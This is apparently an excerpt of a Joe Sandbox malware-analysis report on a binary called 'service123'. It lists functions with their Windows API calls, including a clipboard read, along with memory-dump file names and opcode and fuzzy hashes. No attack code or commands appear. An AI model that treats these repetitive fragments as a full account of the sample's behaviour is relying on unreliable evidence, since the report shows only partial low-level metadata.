Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 5befe5890840c10e910e56177a10d180443e384fc9bbcfb61a38afdea868dc3a
Instruction ID: 797732e699b34cf421cde1835fa660342e50ff0bf7a39438f72e9f1be1bb4740
Opcode Fuzzy Hash: 5befe5890840c10e910e56177a10d180443e384fc9bbcfb61a38afdea868dc3a
Instruction Fuzzy Hash: F5317C706893098FDB00EF29C58571BBBF0BB46319F15861DECA84BA94D331E506CF92

Function 6C2FF9D1 Relevance: 6.1, APIs: 4, Instructions: 81synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2FFA72
CreateSemaphoreW.KERNEL32 ref: 6C2FFAB7
WaitForSingleObject.KERNEL32 ref: 6C2FFB00

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 8031385191eeff3bf5a89481ff335bde87f1996c0a091045f2999c8512026f4c
Instruction ID: c4b626f80b3558e40523ba76a6cc6ff5840c10eaaeaf8415db0f1296e6c4b3e4
Opcode Fuzzy Hash: 8031385191eeff3bf5a89481ff335bde87f1996c0a091045f2999c8512026f4c
Instruction Fuzzy Hash: 7D3118706893098FDB10EF2DC58575BBBF4BB4A319F15865CECA887680D331E646CB92

Function 6C2FFB60 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2FFBF2
CreateSemaphoreW.KERNEL32 ref: 6C2FFC37
WaitForSingleObject.KERNEL32 ref: 6C2FFC80

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: f849e923375621deae5c1b3e5a76a067fa7c836f426a1e3741a218f322a525f6
Instruction ID: 5ffa28476c403e365571daccb6a59a8eae609d50728cfb11138edfc11fc811b9
Opcode Fuzzy Hash: f849e923375621deae5c1b3e5a76a067fa7c836f426a1e3741a218f322a525f6
Instruction Fuzzy Hash: F33138706893198FDB00EF29C19571BBBF4BB46359F018258ECA88BA84C335E546CF92

Function 6C2F55A8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2F72FE

Strings

{parm#, xrefs: 6C2F72D9
this, xrefs: 6C2F55B3
}, xrefs: 6C2F7392

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: 845ef6f6dc5983d7ff2ac3be4f14e4c1d04358b12a0b16f71bb0fa887fa5056b
Instruction ID: 3994074d3b0eb2375def68247ede5e609f68ed960a0dcbc6e26c7375f452bbfd
Opcode Fuzzy Hash: 845ef6f6dc5983d7ff2ac3be4f14e4c1d04358b12a0b16f71bb0fa887fa5056b
Instruction Fuzzy Hash: 9D21A37154D34ACFD7018F18C0807A9BBA1AF91704F19C5BEDCD84FA4AC77594868BA2

Function 00531001 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0053106B
__p__fmode.MSVCRT ref: 00531070
__p__commode.MSVCRT ref: 0053107D

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: 1eb0d283a5ac1cfbd9b5fbba53006a19c8cb7f272c36a9f3f40f9d40416266c3
Instruction ID: 95457a0e9b03febe5559850ebb7f1606ffd8438fed5384925014255891eb6632
Opcode Fuzzy Hash: 1eb0d283a5ac1cfbd9b5fbba53006a19c8cb7f272c36a9f3f40f9d40416266c3
Instruction Fuzzy Hash: FD21B470504A02CBC31CAF30D65D3693BF1BB54344F948568C4184B355E77AD8CAEBA9

Function 6C309BD7 Relevance: 6.0, APIs: 4, Instructions: 38clipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32 ref: 6C309BE7
GlobalLock.KERNEL32 ref: 6C309BF9
GlobalUnlock.KERNEL32 ref: 6C309C1A
CloseClipboard.USER32 ref: 6C309C23
CloseClipboard.USER32 ref: 6C309C48
GetClipboardSequenceNumber.USER32 ref: 6C309C6E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: Clipboard$CloseGlobal$DataLockNumberSequenceUnlock
String ID:
API String ID: 1345600146-0
Opcode ID: 56e456ee384bd283adfb364739a441de068d3fa9447438d777252ea4dc6eab1a
Instruction ID: 5b6ffb02de20fbf43551a0e540846c4b6565384dd1aceae40eb813d50f809902
Opcode Fuzzy Hash: 56e456ee384bd283adfb364739a441de068d3fa9447438d777252ea4dc6eab1a
Instruction Fuzzy Hash: 79F031B2B097018FDB00BF7C95491AEBBF1AB55214F05093DD8C697A44EB35D4498F93

Function 6C369D20 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C369D35
strlen.MSVCRT ref: 6C369D3F
memcpy.MSVCRT ref: 6C369D68
setlocale.MSVCRT ref: 6C369D7C

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 2d7261e8456965f6bc5941a5f70b7335063294d074be577a42399c38fd54e003
Instruction ID: 8bff51ff7ba3e1624fbb219c94484ba52963e6adac48d31f4c597b49cd971601
Opcode Fuzzy Hash: 2d7261e8456965f6bc5941a5f70b7335063294d074be577a42399c38fd54e003
Instruction Fuzzy Hash: C6F0DAB26093119AD3007F68D5463AFFAE4EF80654F01895DE4D88B711D778D4489F93

Function 6C38B740 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 432COMMON

Download Yara Rule

Strings

T<l, xrefs: 6C3C51F8
H<l, xrefs: 6C3C5240

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: H<l$T<l
API String ID: 0-2479420480
Opcode ID: efce7075d28c83abe052b72565403d8bf91e107b8709ebc1d2cfb4fe28e19863
Instruction ID: 58dc3141a696512faced7933c6321f25151dc0d16c20967609335ee08b6be622
Opcode Fuzzy Hash: efce7075d28c83abe052b72565403d8bf91e107b8709ebc1d2cfb4fe28e19863
Instruction Fuzzy Hash: 02E1FCB4245B198BC7417F7088905EEB6A1BF4564CF426C2CE4E24BB11CF78894AAFD7

Function 00534558 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 00534596
@, xrefs: 00534647

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: 41280abcddec304c616a142e4d8be2c7a1fb0962f66e5b54692734894ea401ec
Instruction ID: ef73c6cd59b024407cbc1bbbf57a5ec09520428f8b45607ab668d79e7540b510
Opcode Fuzzy Hash: 41280abcddec304c616a142e4d8be2c7a1fb0962f66e5b54692734894ea401ec
Instruction Fuzzy Hash: C7A16D7150C3968BDB31CF24D0903AABFE1BB85314F148A2DE8D997252D735E949DF82

Function 6C304C28 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 6C304C66
@, xrefs: 6C304D17

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: a1880444071c40c11e7de43b867e91e7e0ddeb865448957f78c489773285374b
Instruction ID: 5b15bf2f6d49cb9942c51f6eeda9b306a594123c894555b05b2b1755cd212c2e
Opcode Fuzzy Hash: a1880444071c40c11e7de43b867e91e7e0ddeb865448957f78c489773285374b
Instruction Fuzzy Hash: 5DA18A7270C3958BD720CF25C09039ABBE5BF95318F148A5DE8D887681D736DA49CF86

Function 00534C21 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00534DBE

Part of subcall function 00532830: fputc.MSVCRT ref: 005328F8

Strings

(null), xrefs: 00534C27
@, xrefs: 00534647

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: 1aaba83d797f0477a2c300ee8867ef84617f26f036afcc6196eb06f429cca3eb
Instruction ID: a68d441de6014b2cd9d8833b7a2968e76582c268ea4f678f7b09c7c0eb5f9f51
Opcode Fuzzy Hash: 1aaba83d797f0477a2c300ee8867ef84617f26f036afcc6196eb06f429cca3eb
Instruction Fuzzy Hash: 0F919E356083968BDB318F24D0903AABFE1BF85714F148A1DE8D897342D735E94ADF82

Function 6C3052F1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C30548E

Part of subcall function 6C302F00: fputc.MSVCRT ref: 6C302FC8

Strings

@, xrefs: 6C304D17
(null), xrefs: 6C3052F7

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: de0fccb5829fcf180e106aa801b0ca355f73966336c5cf574f167570b521c704
Instruction ID: 575765dd241e9ac422e94960af363a67e45ddc2e32b2e8c4a915d917682b96da
Opcode Fuzzy Hash: de0fccb5829fcf180e106aa801b0ca355f73966336c5cf574f167570b521c704
Instruction Fuzzy Hash: EF918A7270C3958BD721CE24C09039ABBE5BF85318F148A5DE8D887781D736DA4ACF86

Function 6C385B60 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C385B9A
wcslen.MSVCRT ref: 6C385C2C
wcslen.MSVCRT ref: 6C385CBE
strlen.MSVCRT ref: 6C385D50

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: cdf3a0b651241c22c12e710b687073a9104b3dde0665ed02649b845eec69fd4e
Instruction ID: 43197924482b9bbd526f8b9e12a0445f05fd8e8458b6a7fda7de01532862597e
Opcode Fuzzy Hash: cdf3a0b651241c22c12e710b687073a9104b3dde0665ed02649b845eec69fd4e
Instruction Fuzzy Hash: 01F14CB4A05605CFCB00DF6CC4849AEBBF0BF84314B118669E896CBB54EB35E945CF92

Function 6C385380 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C3853BA
wcslen.MSVCRT ref: 6C38544C
wcslen.MSVCRT ref: 6C3854DE
strlen.MSVCRT ref: 6C385570

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 87d07027ba7ab5a61d3b3c4dccc112f3e9073f54e9ed2b036edc39312cc1eed0
Instruction ID: 81488bfbcb272efa37221f993f8b3743f21e125f027ac3773868b1cba0fdfa4f
Opcode Fuzzy Hash: 87d07027ba7ab5a61d3b3c4dccc112f3e9073f54e9ed2b036edc39312cc1eed0
Instruction Fuzzy Hash: 87F139B4A056058FDB00DF6CC0849AEBBF1BF84314B518A69E896CBB54D735E945CF82

Function 005329B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00532A31

Strings

NaN, xrefs: 005329B1

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction ID: a8eb7eefe777ebbeb5af00e21ae72b6b4fc23cba5a85e39bcdbac3e8193651db
Opcode Fuzzy Hash: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction Fuzzy Hash: 6E4105B1A04A15CBDB24CF18C484756BBE5BF88710F29C6A9DD889F34AD372DC46CB90

Function 6C303080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C303101

Strings

NaN, xrefs: 6C303081

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction ID: 43824e1752b317612764fcf14b2bf99ae77bc358a6f85d31e5aa405ad65e23fd
Opcode Fuzzy Hash: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction Fuzzy Hash: 774117B2B05615CBDB54DF18C480B86B7E5AF89708B29C299DC888F74AD336DC46CF91

Function 6C384B80 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C384BBA
strlen.MSVCRT ref: 6C384C3D
strlen.MSVCRT ref: 6C384CC0
strlen.MSVCRT ref: 6C384D43

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 690b733315128e17ba283abe6218c9743564cda4cd6673da4320cda03478d793
Instruction ID: 854f36235fed7922905ff1aae1c2447c188d9a6537019c1d03215587446f0c5b
Opcode Fuzzy Hash: 690b733315128e17ba283abe6218c9743564cda4cd6673da4320cda03478d793
Instruction Fuzzy Hash: 0FE148B4A056058FC704DF6CC190AAEFBF5BF44314B108A69E895CBB54E735E90ACF92

Function 6C384380 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3843BA
strlen.MSVCRT ref: 6C38443D
strlen.MSVCRT ref: 6C3844C0
strlen.MSVCRT ref: 6C384543

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: a8eaf51279f258cda2a4cf9a41ac5eb3f8b6ba3262af9d3c9bd82d3b52c5bde0
Instruction ID: 5111746a1ced29e28a80673644c70010fea2689f88531c3275755e034149b4ea
Opcode Fuzzy Hash: a8eaf51279f258cda2a4cf9a41ac5eb3f8b6ba3262af9d3c9bd82d3b52c5bde0
Instruction Fuzzy Hash: F4E159B4A056458FCB04DF6CC0909AEFBF5BF45314B108A69E8A5CBB54E735E906CF82

Function 6C30DFA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 6C30DFAE
strlen.MSVCRT ref: 6C30DFC1

Strings

basic_string: construction from null is not valid, xrefs: 6C30DFE3

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strerrorstrlen
String ID: basic_string: construction from null is not valid
API String ID: 960536887-2991274800
Opcode ID: 22931a552e00e402586194fb82c97ddc037cfcd61dc4dc1480682108866f95ff
Instruction ID: 4b6dd39d410555bb978433920a14d51f46e43ee399863d48c5d60106fe663170
Opcode Fuzzy Hash: 22931a552e00e402586194fb82c97ddc037cfcd61dc4dc1480682108866f95ff
Instruction Fuzzy Hash: DB111FB3B093008F8701FF7DC94645ABBF1AB89214F85CA69D8C487709E635D8498FA3

Function 00532F46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00532E97
fputc.MSVCRT ref: 00532F07
memset.MSVCRT ref: 00532FC2

Strings

o, xrefs: 00532F5E

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
